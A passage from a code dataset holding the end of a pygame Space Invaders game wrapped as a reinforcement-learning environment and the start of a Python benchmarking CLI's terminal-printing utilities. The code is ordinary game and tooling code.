45))\n\t\t\t\tgame.screen.blit(self.image, (self.rect.x-6, self.rect.y-6))\n\t\t\tif currentTime - self.timer > 400:\n\t\t\t\tself.kill()\n\t\n\tdef load_image(self):\n\t\timgColors = [\"purple\", \"blue\", \"blue\", \"green\", \"green\"]\n\t\tself.image = IMAGES[\"explosion{}\".format(imgColors[self.row])]\n\n\t\t\t\nclass Life(sprite.Sprite):\n\tdef __init__(self, xpos, ypos):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"ship\"]\n\t\tself.image = transform.scale(self.image, (23, 23))\n\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\t\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Text(object):\n\tdef __init__(self, textFont, size, message, color, xpos, ypos):\n\t\tself.font = font.Font(textFont, size)\n\t\tself.surface = self.font.render(message, True, color)\n\t\tself.rect = self.surface.get_rect(topleft=(xpos, ypos))\n\n\tdef draw(self, surface):\n\t\tsurface.blit(self.surface, self.rect)\n\n\nclass SpaceInvaders(object):\n\tdef __init__(self):\n\t\tmixer.pre_init(44100, -16, 1, 512)\n\t\tinit()\n\t\tself.caption = display.set_caption('Space Invaders')\n\t\tself.screen = SCREEN\n\t\tself.background = image.load('ple/games/SpaceInvadersGame/images/background.jpg').convert()\n\t\tself.startGame = True\n\t\t#self.mainScreen = True\n\t\tself.gameOver = False\n\t\t# Initial value for a new game\n\t\tself.enemyPositionDefault = 65\n\t\t# Counter for enemy starting position (increased each new round)\n\t\tself.enemyPositionStart = self.enemyPositionDefault\n\t\t# Current enemy starting position\n\t\tself.enemyPosition = self.enemyPositionStart\n\n\tdef reset(self, score, lives, newGame=False):\n\t\tself.player = Ship()\n\t\tself.playerGroup = sprite.Group(self.player)\n\t\tself.explosionsGroup = sprite.Group()\n\t\tself.bullets = sprite.Group()\n\t\tself.mysteryShip = Mystery()\n\t\tself.mysteryGroup = sprite.Group(self.mysteryShip)\n\t\tself.enemyBullets = sprite.Group()\n\t\tself.reset_lives(lives)\n\t\tself.enemyPosition = self.enemyPositionStart\n\t\tself.make_enemies()\n\t\t# Only create blockers on a new game, not a new round\n\t\tif newGame:\n\t\t\tself.allBlockers = sprite.Group(self.make_blockers(0), self.make_blockers(1), self.make_blockers(2), self.make_blockers(3))\n\t\tself.keys = key.get_pressed()\n\t\tself.clock = time.Clock()\n\t\tself.timer = time.get_ticks()\n\t\tself.noteTimer = time.get_ticks()\n\t\tself.shipTimer = time.get_ticks()\n\t\tself.score = score\n\t\tself.lives = lives\n\t\t#self.create_audio()\n\t\tself.create_text()\n\t\tself.killedRow = -1\n\t\tself.killedColumn = -1\n\t\tself.makeNewShip = False\n\t\tself.shipAlive = True\n\t\tself.killedArray = [[0] * 10 for x in range(5)]\n\t\tself.startGame = True\n\t\tself.gameOver = False\n\n\tdef make_blockers(self, number):\n\t\tblockerGroup = sprite.Group()\n\t\tfor row in range(4):\n\t\t\tfor column in range(9):\n\t\t\t\tblocker = Blocker(10, GREEN, row, column)\n\t\t\t\tblocker.rect.x = 50 + (200 * number) + (column * blocker.width)\n\t\t\t\tblocker.rect.y = 450 + (row * blocker.height)\n\t\t\t\tblockerGroup.add(blocker)\n\t\treturn blockerGroup\n\t\n\tdef reset_lives_sprites(self):\n\t\tself.life1 = Life(715, 3)\n\t\tself.life2 = Life(742, 3)\n\t\tself.life3 = Life(769, 3)\n\t\t\n\t\tif self.lives >= 3:\n\t\t\tself.livesGroup = sprite.Group(self.life1, self.life2, self.life3)\n\t\telif self.lives == 2:\n\t\t\tself.livesGroup = sprite.Group(self.life1, self.life2)\n\t\telif self.lives == 1:\n\t\t\tself.livesGroup = sprite.Group(self.life1)\n\t\n\tdef reset_lives(self, lives):\n\t\tself.lives = lives\n\t\tself.reset_lives_sprites()\n\t\n\tdef create_audio(self):\n\t\tself.sounds = {}\n\t\tfor sound_name in [\"shoot\", \"shoot2\", \"invaderkilled\", \"mysterykilled\", \"shipexplosion\"]:\n\t\t\tself.sounds[sound_name] = mixer.Sound(\"ple/games/SpaceInvadersGame/sounds/{}.wav\".format(sound_name))\n\t\t\tself.sounds[sound_name].set_volume(0.2)\n\n\t\tself.musicNotes = [mixer.Sound(\"ple/games/SpaceInvadersGame/sounds/{}.wav\".format(i)) for i in range(4)]\n\t\tfor sound in self.musicNotes:\n\t\t\tsound.set_volume(0.5)\n\n\t\tself.noteIndex = 0\n\n\tdef play_main_music(self, currentTime):\n\t\tmoveTime = self.enemies.sprites()[0].moveTime\n\t\tif currentTime - self.noteTimer > moveTime:\n\t\t\tself.note = self.musicNotes[self.noteIndex]\n\t\t\tif self.noteIndex < 3:\n\t\t\t\tself.noteIndex += 1\n\t\t\telse:\n\t\t\t\tself.noteIndex = 0\n\n\t\t\tself.note.play()\n\t\t\tself.noteTimer += moveTime\n\n\tdef create_text(self):\n\t\tself.titleText = Text(FONT, 50, \"Space Invaders\", WHITE, 164, 155)\n\t\tself.titleText2 = Text(FONT, 25, \"Press any key to continue\", WHITE, 201, 225)\n\t\tself.gameOverText = Text(FONT, 50, \"Game Over\", WHITE, 250, 270)\n\t\tself.nextRoundText = Text(FONT, 50, \"Next Round\", WHITE, 240, 270)\n\t\tself.enemy1Text = Text(FONT, 25, \" = 10 pts\", GREEN, 368, 270)\n\t\tself.enemy2Text = Text(FONT, 25, \" = 20 pts\", BLUE, 368, 320)\n\t\tself.enemy3Text = Text(FONT, 25, \" = 30 pts\", PURPLE, 368, 370)\n\t\tself.enemy4Text = Text(FONT, 25, \" = ?????\", RED, 368, 420)\n\t\tself.scoreText = Text(FONT, 20, \"Score\", WHITE, 5, 5)\n\t\tself.livesText = Text(FONT, 20, \"Lives \", WHITE, 640, 5)\n\t\t\n\tdef check_input(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif e.type == KEYDOWN:\n\t\t\t\tif e.key == K_SPACE:\n\t\t\t\t\tif len(self.bullets) == 0 and self.shipAlive:\n\t\t\t\t\t\tif self.score < 1000:\n\t\t\t\t\t\t\tbullet = Bullet(self.player.rect.x+23, self.player.rect.y+5, -1, 15, \"laser\", \"center\")\n\t\t\t\t\t\t\tself.bullets.add(bullet)\n\t\t\t\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t\t\t\t#self.sounds[\"shoot\"].play()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tleftbullet = Bullet(self.player.rect.x+8, self.player.rect.y+5, -1, 15, \"laser\", \"left\")\n\t\t\t\t\t\t\trightbullet = Bullet(self.player.rect.x+38, self.player.rect.y+5, -1, 15, \"laser\", \"right\")\n\t\t\t\t\t\t\tself.bullets.add(leftbullet)\n\t\t\t\t\t\t\tself.bullets.add(rightbullet)\n\t\t\t\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t\t\t\t#self.sounds[\"shoot2\"].play()\n\tdef get_action_left(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.move_left()\n\n\tdef get_action_right(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.move_right()\n\t\n\tdef get_no_action(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.no_move()\n\n\tdef get_genetic_action(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\n\tdef shoot(self):\n\t\tif len(self.bullets) == 0 and self.shipAlive:\n\t\t\tif self.score < 1000:\n\t\t\t\tbullet = Bullet(self.player.rect.x+23, self.player.rect.y+5, -1, 15, \"laser\", \"center\")\n\t\t\t\tself.bullets.add(bullet)\n\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t#self.sounds[\"shoot\"].play()\n\t\t\telse:\n\t\t\t\tleftbullet = Bullet(self.player.rect.x+8, self.player.rect.y+5, -1, 15, \"laser\", \"left\")\n\t\t\t\trightbullet = Bullet(self.player.rect.x+38, self.player.rect.y+5, -1, 15, \"laser\", \"right\")\n\t\t\t\tself.bullets.add(leftbullet)\n\t\t\t\tself.bullets.add(rightbullet)\n\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t#self.sounds[\"shoot2\"].play()\n\tdef make_enemies(self):\n\t\tenemies = sprite.Group()\n\t\tfor row in range(5):\n\t\t\tfor column in range(10):\n\t\t\t\tenemy = Enemy(row, column)\n\t\t\t\tenemy.rect.x = 157 + (column * 50)\n\t\t\t\tenemy.rect.y = self.enemyPosition + (row * 45)\n\t\t\t\tenemies.add(enemy)\n\t\t\n\t\tself.enemies = enemies\n\t\tself.allSprites = sprite.Group(self.player, self.enemies, self.livesGroup, self.mysteryShip)\n\n\tdef make_enemies_shoot(self):\n\t\tcolumnList = []\n\t\tfor enemy in self.enemies:\n\t\t\tcolumnList.append(enemy.column)\n\n\t\tcolumnSet = set(columnList)\n\t\tcolumnList = list(columnSet)\n\t\tshuffle(columnList)\n\t\tcolumn = columnList[0]\n\t\tenemyList = []\n\t\trowList = []\n\n\t\tfor enemy in self.enemies:\n\t\t\tif enemy.column == column:\n\t\t\t\trowList.append(enemy.row)\n\t\trow = max(rowList)\n\t\tfor enemy in self.enemies:\n\t\t\tif enemy.column == column and enemy.row == row:\n\t\t\t\tif (time.get_ticks() - self.timer) > 200: # changed from original 700 (affects enemy bullet amount)\n\t\t\t\t\tself.enemyBullets.add(Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, \"enemylaser\", \"center\"))\n\t\t\t\t\tself.allSprites.add(self.enemyBullets)\n\t\t\t\t\tself.timer = time.get_ticks() \n\n\tdef calculate_score(self, row):\n\t\tscores = {0: 30,\n\t\t\t\t 1: 20,\n\t\t\t\t 2: 20,\n\t\t\t\t 3: 10,\n\t\t\t\t 4: 10,\n\t\t\t\t 5: 150 # choice([50, 100, 150, 300])\n\t\t\t\t }\n\t\t\t\t\t \n\t\tscore = scores[row]\n\t\tself.score += score\n\t\treturn score\n\tdef get_state(self, factor):\n\t\twidth = mth.floor(800/factor)\n\t\theight = mth.floor(600/factor)\n\t\tstate_array = np.zeros([width,height],dtype=np.int)\n\t\tfor spr in self.allSprites.sprites():\n\t\t\tx = mth.floor(spr.rect.center[0] / factor)-1\n\t\t\ty = mth.floor(spr.rect.center[1] / factor)-1\n\t\t\tif type(spr).__name__ == 'Ship':\n\t\t\t\tstate_array[x][y] = 1\n\t\t\tif type(spr).__name__ == 'Enemy':\n\t\t\t\tstate_array[x][y] = 2\n\t\t\tif type(spr).__name__ == 'Bullet':\n\t\t\t\tif(spr.direction == 1):\n\t\t\t\t\tstate_array[x][y] = 3\n\t\t\t\telse:\n\t\t\t\t\tstate_array[x][y] = 6\n\t\t\tif type(spr).__name__ == 'Mystery':\n\t\t\t\tif x >= 0 and y >= 0 and x < width and y <= height:\n\t\t\t\t\tstate_array[x][y] = 4\n\t\tfor blocker in self.allBlockers:\n\t\t\tx = mth.floor(blocker.rect.center[0] / factor)-1\n\t\t\ty = mth.floor(blocker.rect.center[1] / factor)-1\n\t\t\tstate_array[x][y] = 5\n\t\treturn state_array\n\t\n\tdef update_enemy_speed(self):\n\t\tif len(self.enemies) <= 10:\n\t\t\tfor enemy in self.enemies:\n\t\t\t\tenemy.moveTime = 400\n\t\tif len(self.enemies) == 1:\n\t\t\tfor enemy in self.enemies:\n\t\t\t\tenemy.moveTime = 200\n\t\t\t\t\n\tdef check_collisions(self):\n\t\t# 1 for enemy and 2 for player\n\t\tkilled = 0\n\t\t\n\t\tcollidedict = sprite.groupcollide(self.bullets, self.enemyBullets, True, False)\n\t\tif collidedict:\n\t\t\tfor value in collidedict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\tself.enemyBullets.remove(currentSprite)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\n\t\tenemiesdict = sprite.groupcollide(self.bullets, self.enemies, True, False)\n\t\tif enemiesdict:\n\t\t\tfor value in enemiesdict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\t#self.sounds[\"invaderkilled\"].play()\n\t\t\t\t\tself.killedRow = currentSprite.row\n\t\t\t\t\tself.killedColumn = currentSprite.column\n\t\t\t\t\tscore = self.calculate_score(currentSprite.row)\n\t\t\t\t\texplosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, False, score)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\t\t\t\t\tself.enemies.remove(currentSprite)\n\t\t\t\t\tself.gameTimer = time.get_ticks()\n\t\t\t\t\tkilled = 1\n\t\t\t\t\tbreak\n\n\t\tmysterydict = sprite.groupcollide(self.bullets, self.mysteryGroup, True, True)\n\t\tif mysterydict:\n\t\t\tfor value in mysterydict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\tcurrentSprite.mysteryEntered.stop()\n\t\t\t\t\t#self.sounds[\"mysterykilled\"].play()\n\t\t\t\t\tscore = self.calculate_score(currentSprite.row)\n\t\t\t\t\texplosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, True, score)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\t\t\t\t\tself.mysteryGroup.remove(currentSprite)\n\t\t\t\t\tnewShip = Mystery()\n\t\t\t\t\tself.allSprites.add(newShip)\n\t\t\t\t\tself.mysteryGroup.add(newShip)\n\t\t\t\t\tkilled = 1\n\t\t\t\t\tbreak\n\n\t\tbulletsdict = sprite.groupcollide(self.enemyBullets, self.playerGroup, True, False) \n\t\tif bulletsdict:\n\t\t\tfor value in bulletsdict.values():\n\t\t\t\tfor playerShip in value:\n\t\t\t\t\tif self.lives > 3:\n\t\t\t\t\t\tself.lives -= 1 \n\t\t\t\t\telif self.lives == 3:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life3)\n\t\t\t\t\t\tself.allSprites.remove(self.life3)\n\t\t\t\t\telif self.lives == 2:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life2)\n\t\t\t\t\t\tself.allSprites.remove(self.life2)\n\t\t\t\t\telif self.lives == 1:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life1)\n\t\t\t\t\t\tself.allSprites.remove(self.life1)\n\t\t\t\t\t\tself.gameOver = True\n\t\t\t\t\t\tself.startGame = False\n\t\t\t\t\tkilled = 2\n\n\t\t\t\t\t#self.sounds[\"shipexplosion\"].play()\n\t\t\t\t\texplosion = Explosion(playerShip.rect.x, playerShip.rect.y, 0, True, False, 0)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(playerShip)\n\t\t\t\t\tself.playerGroup.remove(playerShip)\n\t\t\t\t\tself.makeNewShip = True\n\t\t\t\t\tself.shipTimer = time.get_ticks()\n\t\t\t\t\tself.shipAlive = False\n\n\t\tif sprite.groupcollide(self.enemies, self.playerGroup, True, True):\n\t\t\tself.gameOver = True\n\t\t\tself.startGame = False\n\n\t\tif sprite.groupcollide(self.bullets, self.allBlockers, True, True):\n\t\t\tkilled = 2\n\t\tsprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)\n\t\tsprite.groupcollide(self.enemies, self.allBlockers, False, True)\n\n\t\treturn killed\n\n\tdef create_new_ship(self, createShip, currentTime):\n\t\tif createShip and (currentTime - self.shipTimer > 900):\n\t\t\tself.player = Ship()\n\t\t\tself.allSprites.add(self.player)\n\t\t\tself.playerGroup.add(self.player)\n\t\t\tself.makeNewShip = False\n\t\t\tself.shipAlive = True\n\n\tdef create_game_over(self, currentTime):\n\t\tself.mainScreen = True\n\t\t\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\ngame = SpaceInvaders()\nclass SpaceInvadersGame(base.PyGameWrapper):\n\t\n\n\tdef __init__(self, width=800, height=600, pipe_gap=100):\n\n\t\tactions = {\n\t\t\t \"right\": K_RIGHT,\n\t\t\t \"left\" : K_LEFT,\n\t\t\t \"space\": K_SPACE\n\t\t\t #\"zero\" : K_0\n\t\t}\n\n\t\tfps = 30\n\n\t\tbase.PyGameWrapper.__init__(self, width, height, actions=actions)\n\t\t# so we can preload images\n\t\tdisplay.set_mode((1, 1),NOFRAME)\n\n\t\tself.scale = 30.0 / fps\n\n\t\tself.allowed_fps = 30 # restrict the fps\n\t\n\tdef init(self):\n\t\tself.game = game\n\t\tself.game.reset(0,5 , newGame=True)\n\t\tself.lives = 5\n\t\tself.score = 0\n\t\tself.game_tick = 0\n\n\n\tdef getGameState(self):\n\t\t\"\"\"\n\t\tGets a non-visual state representation of the game.\n\n\t\tReturns\n\t\t-------\n\n\t\tdict\n\t\t\t* player x position.\n\t\t\t* players velocity.\n\t\t\t* Game Score\n\t\t\t* Player Lives\n\n\n\t\t\tSee code for structure.\n\n\t\t\"\"\"\n\n\t\tstate = {\n\t\t\t\"player_x\": self.game.player.rect.x,\n\t\t\t\"player_y\": self.game.player.rect.y,\n\n\t\t\t\"Game Score\": self.game.score ,\n\t\t\t\"Lives\": self.lives\n\t\t}\n\n\t\treturn state\n\n\tdef getScore(self):\n\t\treturn self.score\n\n\tdef _handle_player_events(self):\n\t\tfor current_event in event.get():\n\t\t\tif current_event.type == QUIT:\n\t\t\t\tquit()\n\t\t\t\tsys.exit()\n\n\t\t\tif current_event.type == KEYDOWN:\n\t\t\t\tkey = current_event.key\n\t\t\t\tif key == self.actions['right']:\n\t\t\t\t\tself.game.get_action_right()\n\t\t\t\telif key == self.actions['left']:\n\t\t\t\t\tself.game.get_action_left() \n\t\t\t\telif key == self.actions['space']:\n\t\t\t\t\tself.game.shoot()\n\t\t\t\t#elif key == self.actions['zero']:\n\t\t\t\t#\tself.game.get_no_action()\n\n\tdef game_over(self):\n\t\treturn self.game.lives <= 0\n\t\n\tdef reset_game(self):\n\t\treturn self.game.reset(0,5, newGame=True)\n\n\tdef step(self, dt):\n\t\tself.game_tick += 1\n\t\tdt = dt / 1000.0\n\n\t\tself.score += self.rewards[\"tick\"]\n\t\t\n\t\tif self.game.startGame:\n\t\t\t\tif len(self.game.enemies) == 0:\n\t\t\t\t\tcurrentTime = time.get_ticks()\n\t\t\t\t\tif currentTime - self.game.gameTimer < 3000: \n\t\t\t\t\t\tself.game.screen.blit(self.game.background, (0,0))\n\t\t\t\t\t\tself.game.scoreText2 = Text(FONT, 20, str(self.game.score), GREEN, 85, 5)\n\t\t\t\t\t\tself.game.scoreText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.scoreText2.draw(self.game.screen)\n\t\t\t\t\t\tself.score += self.rewards[\"win\"]\n\t\t\t\t\t\tself.game.nextRoundText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.livesText.draw(self.game.screen)\n\t\t\t\t\t\tself.game.livesGroup.update(self.game.keys)\n\t\t\t\t\t\t# self.check_input()\n\t\t\t\t\t\tself.game.get_state(25)\n\t\t\t\t\t\tself._handle_player_events()\n\t\t\t\t\tif currentTime - self.game.gameTimer > 3000:\n\t\t\t\t\t\t# Move enemies closer to bottom\n\t\t\t\t\t\tself.game.enemyPositionStart += 35\n\t\t\t\t\t\tself.game.reset(self.game.score, self.game.lives)\n\t\t\t\t\t\tself.game.make_enemies()\n\t\t\t\t\t\tself.game.gameTimer += 3000\n\t\t\t\telse:\n\t\t\t\t\tcurrentTime = time.get_ticks()\n\t\t\t\t\t#self.game.play_main_music(currentTime) \n\t\t\t\t\tself.game.screen.blit(self.game.background, (0,0))\n\t\t\t\t\tself.game.allBlockers.update(self.game.screen)\n\t\t\t\t\tself.game.scoreText2 = Text(FONT, 20, str(self.game.score), GREEN, 85, 5)\n\t\t\t\t\tself.game.scoreText.draw(self.game.screen)\n\t\t\t\t\tself.game.scoreText2.draw(self.game.screen)\n\t\t\t\t\tself.game.livesText.draw(self.game.screen)\n\t\t\t\t\t# self.check_input()\n\t\t\t\t\tself.game.get_state(25)\n\t\t\t\t\tself._handle_player_events()\n\t\t\t\t\tself.game.allSprites.update(self.game.keys, currentTime, self.game.killedRow, self.game.killedColumn, self.game.killedArray)\n\t\t\t\t\tself.game.explosionsGroup.update(self.game.keys, currentTime)\n\t\t\t\t\tcheck = self.game.check_collisions()\n\t\t\t\t\tif check == 1:\n\t\t\t\t\t\tself.score += self.rewards[\"win\"] + self.rewards[\"win\"] + self.rewards[\"win\"]\n\t\t\t\t\telif check == 2:\n\t\t\t\t\t\tself.score += self.rewards[\"loss\"]\n\t\t\t\t\t\tself.lives = self.game.lives\n\t\t\t\t\t# else : \n\t\t\t\t\t# \tself.score += self.rewards[\"negative\"]\n\t\t\t\t\tself.game.create_new_ship(self.game.makeNewShip, currentTime)\n\t\t\t\t\tself.game.update_enemy_speed()\n\n\t\t\t\t\tif len(self.game.enemies) > 0:\n\t\t\t\t\t\tself.game.make_enemies_shoot()\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.game.gameOver = True\n\t\t\t\t\t\tself.game.startGame = False\n\t\t\t\t\n\t\telif self.game.gameOver:\n\t\t\tcurrentTime = time.get_ticks()\n\t\t\t# Reset enemy starting position\n\t\t\tself.game.enemyPositionStart = self.game.enemyPositionDefault\n\t\t\tself.game.create_game_over(currentTime)\n\t\t\tself.game.score += self.rewards[\"loss\"]\n\t\t\tself.game.reset(0,3)\n\t\t\tself.lives = self.game.lives\n\t\t\t\t\n\t\tdisplay.update()\n\t\tself.game.clock.tick(60)","sub_path":"ple/games/SpaceInvadersPGame/Single player/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":25248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"500828689","text":"\"\"\"\nUtilities for the CLI we do not want to include into __main__.py\nto not pollute it.\n\"\"\"\n\nfrom setuptools import find_packages\nfrom pkgutil import iter_modules\nimport enum\nimport os\nimport logging\nfrom typing import (\n Optional,\n List,\n Union,\n Tuple,\n TYPE_CHECKING,\n cast,\n Dict,\n Pattern,\n)\nimport inspect\nimport pstats\nimport errno\nimport marshal\nimport re\nif TYPE_CHECKING:\n from ..base import UseCaseResult\n\nfrom .loader import BenchmarkFile\n\nlogger = logging.getLogger(__name__)\n\n_unicode_triangle = \"\\u25B6\"\n\n\nclass Color(enum.Enum):\n\n PURPLE = \"\\033[35m\"\n CYAN = \"\\033[36m\"\n BLUE = \"\\033[34m\"\n GREEN = \"\\033[32m\"\n YELLOW = \"\\033[33m\"\n RED = \"\\033[31m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n END = \"\\033[0m\"\n\n\nclass PrintView:\n\n @staticmethod\n def print(\n *args,\n colors: Union[Color, List[Color], None] = None,\n indent: Union[int, str] = 0,\n ) -> None:\n \"\"\"\n Convenient API for printing colored messages.\n\n Args:\n *args: Messages which should be printed\n colors: Colors from terminal the Color Enum\n indent: How many characters should the message be indented\n \"\"\"\n if not colors:\n colors = []\n elif isinstance(colors, Color):\n colors = [colors]\n if isinstance(indent, int):\n indent = \"\".join([\" \" for _ in range(indent)])\n for message in args:\n print(\"\".join([c.value for c in colors]) + indent\n + message + Color.END.value)\n\n @staticmethod\n def print_divider(message: str = \"\",\n width: Optional[int] = None,\n soft_divider: bool = False,\n **kwargs) -> None:\n # Set width\n window_width = _terminal_size(fallback=(80, 25))[0]\n if width is None or width > window_width:\n width = window_width\n # Trim message if necessary\n message = message.strip()\n if len(message) > width:\n message = message[:width - 4] + \" ...\"\n if message:\n message = \" \" + message + \" \"\n # Create Line to Print\n if soft_divider:\n divider = \"\\u2505\"\n else:\n divider = \"\\u2501\"\n div = \"\".join([divider for _ in range(\n int((width - len(message)) / 2))])\n line = div + message + div\n line += div[:width - len(line)]\n PrintView.print(line, **kwargs)\n\n @staticmethod\n def print_results(\n results: Dict[BenchmarkFile, List[\"UseCaseResult\"]],\n profile_output: str = \"\",\n ) -> None:\n \"\"\"Visualize the File results as a bar graph in the Terminal.\"\"\"\n r: List[\"UseCaseResult\"] = []\n for file, file_results in results.items():\n file_name = os.path.basename(file.file_location)\n PrintView.print(f\"{_unicode_triangle} {file_name}\",\n colors=Color.BOLD)\n grouped_by_name: Dict[str, List[\"UseCaseResult\"]] = {}\n for result in file_results:\n current = grouped_by_name.get(result.use_case_name, [])\n current.append(result)\n grouped_by_name[result.use_case_name] = current\n for uc, rs in grouped_by_name.items():\n PrintView._print_results_of_use_case(\n use_case=uc,\n results=rs,\n profile_output=profile_output,\n )\n r += file_results\n PrintView.print_summary(results=r)\n\n @staticmethod\n def _print_results_of_use_case(use_case: str,\n results: List[\"UseCaseResult\"],\n profile_output: str):\n prefix = \"\\u2514 \"\n if len(results) > 1:\n PrintView.print(prefix + use_case, indent=2)\n for v in results:\n if len(results) == 1:\n name = v.use_case_name\n indent = 2\n else:\n name = v.use_case_params\n indent = 4\n if v.failed:\n PrintView._print_exception(name=name,\n line_prefix=prefix,\n indent=indent,\n exception=v.exception)\n else:\n PrintView._print_bar(name=name,\n line_prefix=prefix,\n indent=indent,\n color=_get_bar_color(result=v),\n value=v.operations_per_second,\n goal=v.goal_operations_per_second,\n minimum=v.minimum_operations_per_second,\n name_len=_terminal_size((80, 25))[0] - 40)\n if v.timed_out:\n PrintView._print_time_out(line_prefix=prefix,\n indent=indent + len(prefix),\n timeout=v.timeout)\n if v.profile_stats is not None:\n PrintView._persist_profile(stats=v.profile_stats,\n use_case=v.use_case_name,\n params=v.use_case_params,\n line_prefix=prefix,\n indent=indent + len(prefix),\n profile_output=profile_output)\n\n @staticmethod\n def print_summary(results: List[\"UseCaseResult\"]) -> None:\n \"\"\"\n Print a line containing a summary of all executed use cases and their\n results. It will list how many of them were green, yellow and red, how\n many failed and how many timed out.\n \"\"\"\n green = [result for result in results\n if _get_bar_color(result) == Color.GREEN]\n yellow = [result for result in results\n if _get_bar_color(result) == Color.YELLOW]\n red = [result for result in results\n if _get_bar_color(result) == Color.RED]\n failed = [result for result in results if result.failed]\n timed_out = [result for result in results if result.timed_out]\n bo = Color.BOLD.value\n gr = Color.GREEN.value\n ye = Color.YELLOW.value\n re = Color.RED.value\n en = Color.END.value\n PrintView.print_divider()\n PrintView.print(f\"Summary (Executed {len(results)} Use Cases)\",\n colors=Color.BOLD)\n PrintView.print(f\"{bo}{gr}GOAL{en} {len(green)} Use Cases\")\n PrintView.print(f\"{bo}{ye}MIN{en} {len(yellow)} Use Cases\")\n PrintView.print(f\"{bo}{re}NONE{en} {len(red)} Use Cases\")\n PrintView.print_divider(soft_divider=True)\n PrintView.print(f\"{bo}{re}Exceptions{en} {len(failed)} Use Cases\")\n PrintView.print(f\"{bo}{re}Timed Out{en} {len(timed_out)} Use Cases\")\n\n @staticmethod\n def _persist_profile(stats: pstats.Stats,\n use_case: str,\n params: str,\n line_prefix: str,\n indent: int,\n profile_output: str):\n \"\"\"\n Print the profiling stats and filter out\n \"\"\"\n file = (f\"{use_case}_{params}\" if params else use_case) + \".profile\"\n file = os.path.abspath(os.path.join(profile_output, file))\n _prepare_directory(file)\n PrintView.print(f\"{line_prefix}Profile saved to {file}\", indent=indent)\n # We want to filter out System calls as well as functions that are part\n # of the Framework\n stats = _get_cleaned(stats,\n filtered_packages=widget_mark_install_path(),\n filter_system_calls=True)\n # Write to file, can be viewed in snakeviz\n with open(file, \"wb\") as f:\n marshal.dump(stats, f)\n\n @staticmethod\n def _print_exception(name: str,\n line_prefix: str,\n indent: int,\n exception: Optional[Exception],\n name_len: int = 45) -> None:\n reason = type(exception).__name__ if exception else \"Exception\"\n name_cut = name[:name_len - 5] + \" ... \" \\\n if len(name) > name_len else name\n label = (\"{:<\" + str(name_len) + \"}\").format(name_cut).format(name)\n message = f\"{line_prefix}{label}: Failed due to {reason}.\"\n PrintView.print(message, colors=[Color.RED, Color.BOLD], indent=indent)\n\n @staticmethod\n def _print_time_out(timeout: float,\n indent: int,\n line_prefix: str = \"\") -> None:\n message = f\"{line_prefix}Timed out after {timeout} seconds.\"\n PrintView.print(message, colors=[Color.RED, Color.BOLD], indent=indent)\n\n @staticmethod\n def _print_bar(name: str,\n line_prefix: str,\n indent: int,\n color: Color,\n goal: float,\n minimum: float,\n value: float,\n name_len: int = 40):\n label = _prepare_bar_labels(name=name,\n line_prefix=line_prefix,\n indent=indent,\n goal=goal,\n minimum=minimum,\n name_len=name_len)\n bar = _prepare_bars(width=30,\n goal=goal,\n value=value,\n color=color)\n truncated_value = \"{:5.1f}\".format(value)\n print(f\"{label}: {bar} {truncated_value}\")\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Private ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\ndef _terminal_size(fallback: Tuple[int, int]) -> Tuple[int, int]:\n \"\"\"\n Try to get the size of the terminal window.\n If it fails, the passed fallback will be returned.\n \"\"\"\n for i in (0, 1):\n try:\n window_width = os.get_terminal_size(i)\n return cast(Tuple[int, int], tuple(window_width))\n except OSError:\n continue\n return fallback\n\n\ndef get_class_that_defined_method(meth):\n try:\n for cls in inspect.getmro(meth.im_class):\n if meth.__name__ in cls.__dict__:\n return cls\n except Exception:\n pass\n return None\n\n\ndef _prepare_bar_labels(name: str,\n line_prefix: str,\n indent: int,\n goal: float,\n minimum: float,\n name_len: int) -> str:\n gr = 